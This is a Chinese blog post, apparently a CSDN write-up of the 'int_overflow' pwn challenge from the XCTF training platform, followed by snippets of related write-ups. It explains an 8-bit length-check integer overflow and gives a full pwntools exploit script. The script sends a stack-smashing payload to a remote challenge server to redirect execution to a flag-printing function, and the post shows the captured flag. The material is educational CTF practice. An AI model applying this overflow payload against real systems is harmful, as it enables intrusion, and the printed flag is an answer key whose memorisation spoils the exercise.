攻防世界pwn【int_overflow】

最新推荐文章于 2024-11-02 10:43:50 发布
最新推荐文章于 2024-11-02 10:43:50 发布
阅读量85 收藏
点赞数
文章标签: 服务器 linux c语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SUOYE_GUANXING/article/details/134126687
版权

下载文件,首先先看文件信息;

使用ida32 查看文件;

跟进login函数

密码长度那么长?继续跟进check_passwd函数;

#include<stdio.h>
 
int main(){
 
        unsigned char x=2;
 
        unsigned char y=258;
 
        if(x==y){
 
                printf("success!");
 
        }
 
        return 0;
 
}   
#这里的输出结果为:success!

无符号整形数据的范围是0~255

所以,准确来说,{256->0,257->1,258->2,259->3,260->4,261->5,262->6...264->8} 

从汇编可以看到,想要覆盖到retn地址,需要先使用0x14 个数据覆盖stack拷贝的passed的内存区域,然后使用4字节数据覆盖ebp,再使用"cat flag"的地址覆盖返回地址,最后接上263剩余的数据即可。

利用整数溢出漏洞可以绕过字符串长度输入检测,但这不是最终目的,绕过长度检测后有个dest字符串,0x14字节大小。

所以payload=‘a’*(0x14+4)+p32(cat_flag)

因为还执行了leave操作,所以还要多减去4个;

payload +=‘a’*(262-len(payload)-4)就可以完成利用了;235 = (263-0x14-4-4)

from pwn import *
op = remote("61.147.171.105",54219)
cat_flag = 0x8048694#之前做题的时候 进到函数的大概位置就行了,不知道为什么现在要求需要很精准;有大佬给解释一下吗?
payload = b'a'*0x18+p32(cat_flag)+b'a'*235#235 = (263-0x14-4-4)准确来说,{256:0,257:1,258:2,259:3,260:4,261:5,262:6...264:8}
op.sendlineafter("Your choice:","1")

op.sendlineafter("Please input your username:",'admin')

op.sendlineafter("Please input your passwd:",payload)
op.interactive()
# print(op.recvall())

cyberpeace{b672f93937acac2231e558fd5bea27f2}

还是个小萌新写的不是很好;理解了,但没有完全理解;

参考了有毒大佬的文章写的非常详细

SHUOYE_GUANXING
关注
攻防世界 int_overflow
09-28 779
1.题目 2.IDA反汇编C程序 3.流程分析 首先,选择login或者退出,选择login,则输入名字和密码,然后校验密码长度,长度小于等于3或者大于8等密码错误,否则成功。 但是看到这里,会有疑问,成功了之后呢?flag呢?在IDA的function view查找,发现一个函数what_is_this。一个存在于原函数但是我们程序流程里面没有调用过的函数。于是思路立马清晰了。我们需要通过栈溢出来覆盖返回地址,将函数what_is_this的地址覆盖到返回地址上。 接..
攻防世界pwn-int_overflow
a_silly_coder的博客
05-14 301
下载文件后首先检查保护,发现不存在canary,可以进行栈溢出。 将文件拖入ida32位进行查看,发现是一个简单的登录。 首先在login()中输入账号和密码,发现passwd存在buf中,可输入长度有0x199,然后传入check_passwd()函数中。 然后在check_passwd中将0x199长度的buf复制给dest,但是dest距离ebp只有0x14,我们也在文件中发现了cat flag的函数,所以思路就很清晰了,在输入密码时,输入一个长字符串,在check_passwd函数..
攻防世界-int_overflow
BengDouLove的博客
03-16 374
输入1进入登陆系统,这个函数下没有漏洞好像 login函数里也看起来很正常,buf和s大小设置都很合理,似乎不会造成溢出 到了login函数最后有检查passwd的函数,题目说的intoverflow就体现在这里了,我也没有自己琢磨出来,看的别人的writeup v3是一个无符号整数,最大值是八个比特都用上即256,但是只要再多1就会溢出,v3会变成从0开始的数,可能是由于程序之前没有对s输入...
攻防世界-pwn新手区-int_overflow
CHAWUCIREN1的博客
08-10 288
看题目就知道是整形溢出 运行一下 检查一下保护机制 丢入32位ida里面 发现一个函数 可以通过覆盖跳转到这个函数就可以拿到flag system_addr = 0x804868B check_passwd处有一个判定,输入的数字要在3和8之间否则就直接退出 在这里需要说明一下,这个unsigned int就是无符号的整型,我们要知道,在计算机中,所有的数据指令都是以二进制的形式存在的,010101这样,那么正负数怎么存在呢,这里就有一个符号位,一般是在一段数据的第一个位置 比如260的十六进制
[攻防世界]int_overflow~巨细讲解
逆向萌新的博客
06-01 452
[攻防世界]int_overflow巨细
攻防世界pwn int_overflow writeup
PLpa的博客
07-07 1873
这是一道整数溢出题 我们知道,整数溢出本身不一定会对程序造成很大的伤害,但是他会造成其他形式的溢出,从而也十分的危险。 拿到题目,我们首先查看一下源代码的保护情况: 从上图可以看出,这是一个32位的程序,并且只开了堆栈不可执行的保护。 我们使用IDA查看一下源码: 我们进入这个check_passwd函数: 当v3>3u且v3<8u时,我们可以进入下面的else中。 else中把...
攻防世界 pwn 新手练习区 int_overflow
ChaoYue_miku的博客
07-07 1104
题目描述:菜鸡感觉这题似乎没有办法溢出,真的么? ** 0、使用checksec检查保护,尝试打开文件 ** 开启了NX保护和部分RELRO,而且是一个32位文件 chmod +x filename 是获取执行权限的命令 执行文件发现有两处输入:用户名和密码 题目提示已经很明显了,整数溢出 ** 1、使用IDA 32 Pro打开文件 ** 查看main函数 输入1之后会执行login()函数,我们跟进查看login()函数 两个read()函数都不存在栈溢出,之后还有一个check_passwd()函
pwn攻防世界 pwn新手区wp
woodwhale的博客
08-10 7297
pwn攻防世界 pwn新手区wp 前言 这几天恶补pwn的各种知识点,然后看了看攻防世界pwn新手区没有堆题(堆才刚刚开始看),所以就花了一晚上的时间把新手区的10题给写完了。 1、get_shell 送分题,连接上去就是/bin/sh 不过不知道为啥我的nc连接不上。。。 还是用pwntool的remote连接的 from pwn import * io = remote("111.200.241.244", 64209) io.interactive() 2、hello pwn 可以看
[攻防世界 pwn]——int_overflow
Y_peak的博客
02-19 243
[攻防世界 pwn]——int_overflow 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下,开启了NX 在IDA中看看, 发现了后面函数和可以gets函数, 不过可惜这个gets函数无法栈溢出。不过我们看到在check_passwd函数中有strcpy函数, dest是可以栈溢出的, 不过前题是我们可以绕过检查。 看了下 , 判断的v3是储存在al这个8位寄存器中, 也就是一个字节。当然也可以从_int8看出来是一个字节 0~255。所
攻防世界 新手区 int_overflow
winterze的博客
04-04 375
攻防世界 新手区 整数溢出 0x00 函数分析 基本信息 [*] '/home/ububtu/ctf/int_overflow' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0...
攻防世界 int_overflow 超超超详细
PushSafe
10-23 2854
pwn纯新手教程 如有错误的地方 希望各位大佬们指出. 整数溢出 int_overflow 整数分为有符号(int)和无符号(unsigned int)两种类型 有符号数以最高位作为其符号位 即正整数最高位为 1,负数为 0 无符号数取值范围为非负数 常见各类型占用字节数如下: 类型 字节 取值范围 int 4 -2147483648~2147483647 short int 2
CTF PWN-攻防世界Overflow整数溢出漏洞
道阻且长,行则将至。
07-29 1843
本文学习了缓冲区溢出漏洞常见的一种场景:整数溢出。一旦不认真考虑整数变量的范围,此类漏洞缺陷很容易在程序员的编码过程中发生,这也是安全工作人员需要注意审计的地方。
Int如何判断overflow
qq_41814546的博客
03-21 1711
int   int型的数值范围是 -2147483648~2147483647即32bit,范围总大小为2^32,那么如何通过判断一个整形是否(表示将会,作为整型它已经不能在int范围之外)overflow?解决办法:首先应从增长方式来看,拟定相应的算法进行判断 我在问题中遇到的增长方式是'添位':预测添位后的高位并且对末位单独判断,间接地使“未来”的整数判断是否overflow?if (res ...
攻防世界pwn(4)
weixin_44319142的博客
04-12 669
int_overflow level3
攻防世界 - The_Maya_Society - writeup
哒君的博客
05-30 1756
The_Maya_Society 文件链接 -> Github 初步分析 压缩包解压以后,有这些文件 打开 html 文件,浏览器中显示如下 点击download按钮,下载launcher文件。由于网站原因,这里download是进不去的,所以直接打开本地的launcher文件 程序执行过程 程序调用了time函数获取当前时间,并把它格式化后,使用 sub_B5A 函数对它进行md...
xctf攻防世界pwn基础题解(新手食用)
热门推荐
Spwpun的博客
05-01 2万+
文章目录CGFsb status:updating… CGFsb 前面的那一道get_shell的题算是做pwn题的一般流程:下载文件,ida查看代码,分析漏洞,利用漏洞写出exp,最常用的是用到python的pwntools,然后使用nc或者pwntools连接到虚拟场景实现漏洞攻击得到flag。 本题的思路基本一致,使用pwntools编写漏洞利用脚本,这里的漏洞是格式化字符串漏洞,文章分...
国产服务器平台离线部署k8s和kubesphere(含离线部署新方式)
最新发布
11-02 531
国产服务器平台离线部署k8s和kubesphere(含离线部署新方式)
Linux特种文件系统--tmpfs文件系统
刘元林的博客
10-29 997
tmpfs类似于RamDisk(只能使用物理内存),使用虚拟内存(简称VM)子系统的页面存储文件。tmpfs完全依赖VM,遵循子系统的整体调度策略。说白了tmpfs跟普通进程差不多,使用的都是某种形式的虚拟内存,至于数据存储在物理内存中还是在交换分区中,全权交由VM子系统。定义: 是一个基于内存的文件系统,它在 RAM 中存储数据,因此访问速度非常快。用途: 通常用于存储临时文件,这些文件不需要永久保存,而且频繁读写。使用 可以减少对物理磁盘的磨损,并提高性能。示例路径:常见的 挂载点包括 、、 等。持
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值